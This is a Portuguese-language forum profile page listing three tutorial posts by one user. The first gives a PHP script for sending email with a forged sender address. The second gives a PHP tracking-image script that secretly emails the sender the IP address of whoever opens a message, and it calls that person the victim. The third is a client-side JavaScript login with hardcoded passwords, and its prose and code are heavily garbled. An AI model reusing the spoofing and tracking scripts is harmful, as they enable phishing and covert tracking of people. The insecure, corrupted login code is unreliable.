Ir para conteúdo
Fórum CódigoFonte.net

Thallys

Membros
  • Total de itens

    3
  • Registro em

  • Última visita

  1. Thallys

    Como enviar e-mail anônimo

    Neste artigo vou mostrar um técnica muito simples de como enviar mensagens de email anônimas ou pior ainda, (poderia dizer melhor...) enviar emails com o endereço de outra pessoa. 1º passo: o código Prepare um arquivo email.php e cpmece a editá-lo, assim: <?php $email_anonimo = 'Sem remetente <>'; $email1 = '<[email protected]>'; $email2 = '<[email protected]>'; $email3 = '<[email protected]>'; $assunto = 'Novidades!' $mensagem = 'Mensagem aqui...........'; $destinatario = '[email protected]'; mail($destinatario, $assunto, $mensagem, "From: $email1"); ?> Salve o arquivo, envie via FTP para a raiz do seu servidor web. Pronto. 2º passo: a execução Agora, você mesmo, abra seu navegador web e digite, conforme o caso: http://www.seu-site-aqui.com/email.php Se tudo der certo, a vítima acaba de receber a mensagem. Moral da história Ao receber um email qualquer, não confie cegamente na mensagem pelo remetente. Essa é uma técnica típica usada por pessoas que agem de má-fé e enviam arquivos anexados com vírus ou links maliciosos, fazendo com que o alvo acredite com facilidade e caia em um de seus golpes. Cuidado. No entanto, é possível descobrir de qual servidor partiu a mensagem através do cabeçalhos HTTP e com isso, denunciar os responsáveis pelo ato. Atenção O artigo foi escrito exclusivamente para estudo e conhecimento técnico. Lembre-se: prejudicar terceiros é crime, passível de sanções da lei.
  2. Thallys

    Descobrindo o IP de uma pessoa com PHP

    Neste tutorial, vou ensinar como obter o endereço IP de uma pessoa usando uma técnica simples em PHP. Se você, leitor, não entende nada de programação, mesmo assim continue lendo e entenda um pouco mais sobre segurança na web. 1º passo: a imagem Escolha uma imagem JPEG fora-de-qualquer-suspeita, como por exemplo, uma mensagem de parabéns ou feliz ano novo. Agora salve/mova esta imagem para um diretório /teste. 2º passo: o código Crie um arquivo imagem.php e começe a editá-lo, como segue: <?php $imagem = "parabens.jpg"; header('content-type: image/jpg'); readfile($imagem); $ip = $_SERVER['REMOTE_ADDR']; $meu_email = '[email protected]'; $assunto_email = 'IP obtido'; $data = date('d/m/Y H:i'); $mensagem_email = "O IP alvo é $ip (data: $data)"; mail($meu_email, $assunto_email, $mensagem_email, "From: PHPMail<>"); ?> Agora salve este arquivo no mesmo diretório da imagem. Feito isso, envie via FTP o diretório teste para a raiz do seu servidor web. 3º passo: o e-mail Agora já está quase tudo pronto. Basta enviar o email para o alvo com a imagem no corpo da mensagem, editando em modo HTML. Escreva algumas palavras e depois insira o código: <img src="http://www.endereco-do-seu-site.com/teste/imagem.php" alt="carregando..." /> Pronto. Agora envie o email. Quando este for aberto pelo usuário e a imagem for carregada, você receberá (por email também!) o IP da vítima e partir daí pode utilizá-lo para os mais diversos fins. Moral da história Esta é uma das razões pelas quais os webmails, como GMail e Hotmail, bloqueiam o carregamento automático das imagens por padrão. Agora pense duas vezes antes de abrir uma mensagem desconhecida e cuidado principalmente com arquivos anexados e imagens. Atenção O artigo foi escrito exclusivamente para estudo e conhecimento técnico. Lembre-se: prejudicar terceiros é crime, passível de sanções da lei.
  3. Thallys

    Sistema de login em JavaScript

    Ola Pessoal , Às vezes é Necessário criar Seções Especiais em hum USUÁRIOS site determined para. É Nessa situação Que Entra uma área restria (AR ), que PoDE Ser criada Utilizando Diversas Linguagens , Sendo Que a Diferença Entre hum e Outro Algoritmo É Basicamente Quanto ao Nível de Segurança dos Dados . O desafio É criar Uma AR baseada em javascript apenas, o Cuidados Que certos expressão é uma excepção , PORQUE OS DADOS Ser confidenciais podem não Expostos Código - Fonte Cliente qualquer par. Primeiramente vamos elaborar UM Formulário HTML simples Dois campos com: hum o login para e Outro Para a Senha . Ao clicar sem Botão , Será uma Chamada Função Login, Que cuidará da Validação dos Dados enviados . <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-br" lang="pt-br"> <head> <title>Área restrita</title> <meta name="author" content="Gabriel Barros | www.gabrielbarros.com.br" /> <script type="text/javascript" src="uadf7ers5tgmkcbg4sh10001fpopl6as.js"></script> </head> <body onload="return(document.acesso.username.focus())"> <form name="acesso" method="post" onsubmit="return Login()" action="#"> <table cellpadding="5" cellspacing="0" summary="form" style="width: 225px; text-align: center; font: 13px 'Trebuchet MS', Tahoma; color: #FFFFFF; border: inset 4px #CDCDCD"> <tr> <td style="background-color: #4585B8; color: #000000" colspan="2">Área restrita:</td> </tr> <tr style="background-color: #010420"> <td>Usuário:</td> <td><input type="text" name="username" size="20" /></td> </tr> <tr style="background-color: #010420"> <td>Senha:</td> <td><input type="password" name="password" size="20" /></td> </tr> <tr style="background-color: #010420"> <td colspan="2" align="center"><input type="submit" value="Login" /></td> </tr> </table> </form> </body> </html> Perceba Que , entre a tag <head> .. < / head> HÁ UM link parágrafo UM ARQUIVO javascript Denominado " uadf7ers5tgmkcbg4sh10001fpopl6as.js ". É justamente Nesse ARQUIVO Que nos vamos Todas armazanar como logins e senhas de e Validar Esses dados enviados Pelo Usuà ¡rio , Por isso vamos codificar ESSA Linha (não o ARQUIVO ! ) para Ninguém Que tome Conhecimento das Informações secretas . Para facilitar , vamos utilizar o software Codificator E- mt ( clique n. Baixar ). Esse Programa e Fácil de USAR ( leia mais Sobre ), basta criar UM ARQUIVO Contendo Apenas uma Linha de Código <script> .. < / script> , Botão Num. clicar e pronto. Depois, VOCÊ copia o Código Gerado Pelo Programa criptografado e não cola Antigo local , assim : era assim : <script type="text/javascript" src="uadf7ers5tgmkcbg4sh10001fpopl6as.js"> </ script> Ficou assim : <script type="text/javascript"> y = 24 / (37 7% ); o y = 27 , z = ""; q = Math.round ( Math.tan ( Math.PI / 4) ) 5; r = O; s =- 1 +2; =""+" c Byixovz & yxiC ( pqMnXiuvSTN_li ?} g unescape "+ ("% % % % A1VUGRYI 5Eumy_nL A1VrQ4py 28D50 % 26lMh7 % 5D % 3AP % 3B % 60JgYM > % 3E % 5B % 3E88 % 7Bo8 % 3A% 7Bo % 7Bo % 7BoL % 7E % 3F % 3E % 3E ")+"; KK98; 6tstst78; : => TST : = JK; : < sstsi;:<:; Lury7jljl7 < 87 »; 7g8 , 9v8 <; 667M8GpjsTjn_; <; 6897; 8 <; ? :; 87.689;?>:; 87676Uvvm : 78hnt : 7 ~ ¡ KRST :; 7 e 05B5yixovzD "+""; para (x = 0; x <c.length;x++){o=c.charCodeAt(x);if(o==254){q+=6;r=39;s=1;if(q> 6) {q = 0; r = 0, s = 0;}} else { if ( o < 127) {if ( o == 30) { o = 92; } + z = String.fromCharCode ( QO );} else { if ( o < 166) { + z = String.fromCharCode (ou );} else { + z = String.fromCharCode (os );}}}} document.write ( z ) < /script > Agora resta tão criar , finalmente o ARQUIVO JS: / ** Arquivo : uadf7ers5tgmkcbg4sh10001fpopl6as.js Objetivo : autenticar o login / Senha do Usuario Autor: Gabriel Barros ( www.gabrielbarros.com.br ) Data: 2010/12/03 Um script UTILIZAÇÃO Deste É TOTALMENTE livre . O ARQUIVO Foi testado e funciona corretamente . NÃO RENOMEIE ESTE ARQUIVO , senão SCRIPT O MAIS NÃO FUNCIONARÁ ! * / Login função () { / INFORMAÇÕES SOBRE OS USUÁRIOS CADASTRADOS -------------------------------------- / / login (1 º ) - , (2 º ) - Senha : ( 3 º) - Endereço da Página restrita (URL) / / Exemplo : [ usuario 0]> login: admin , Senha : 123456 Página; : / ~ users/redir1.html usuario = new Array ( ); usuario [0] = new Array ( "admin", "123456 ",". / users/redir1.html ~ " ); usuario [1] = new Array ( " Admin2 "," aGSABjd ",". users/redirect2.htm / ~ "); usuario [2] = new Array ( "Pedro "," d- hysS + ",". / users ~ / redir.aspx "); usuario [3] = new Array (" Luan " teste "," . / users ~ / main_pedro "); usuario [4] = new Array ( "root", 56uT18vGb " Ans5 ~ 45Y6f $ < sd ",". / users ~ root / ~ " ); usuario [5] = new Array (" msgen32 "," 00.128 *. + HnsO ",". / users ~ / apps_indexb.php "); / / ... / / ... / / ------------------------------------------------ -------------------------------- / / Respostas enviadas Pelo Usuà ¡rio login_fornecido = document.acesso.username.value; senha_fornecida = document.acesso.password.value; / / Página Para onde Será redirecionado Caso uma Senha EO Sejam Inválidos login pagina_erro = " erro.html "; / Tempo / de milissegundos em carregamento , Caso Seja o login efetivado tempo = 2105 / / = 2,1 segundos / / Até Que se provar o contrário, o login e inválido login_valido = false; / A princípio, verificar se o login EXISTE for ( id = 0; < id = usuario.length - 1; id + +) { if ( usuario == login_fornecido [id ] [0] ) { login_valido = true; quebrar } } se login_valido () { / Validar / Senha do Usuario if ( usuario == senha_fornecida [id] [1]) acao (" redirecionar ", id) outro acao (" Sair ") } outro acao (" Sair ") } acao função ( informação , id ) { if ( info == ' Sair ') { window.open ( pagina_erro ", pg "," ) } else if (info == ' redirecionar ') { document.write (" <html> <head> <title> votos ainda título ...</ > <script> função Logar () { window.location = " + usuario [id ] [2] + " ";} setTimeout (\ " Logar ( ) \ "," tempo + + ");</ script> </ head> \ n "); document.write (" <body> <h4> <i> votos ainda ...</ i> < / h4> </ body> </ html > ") } }
×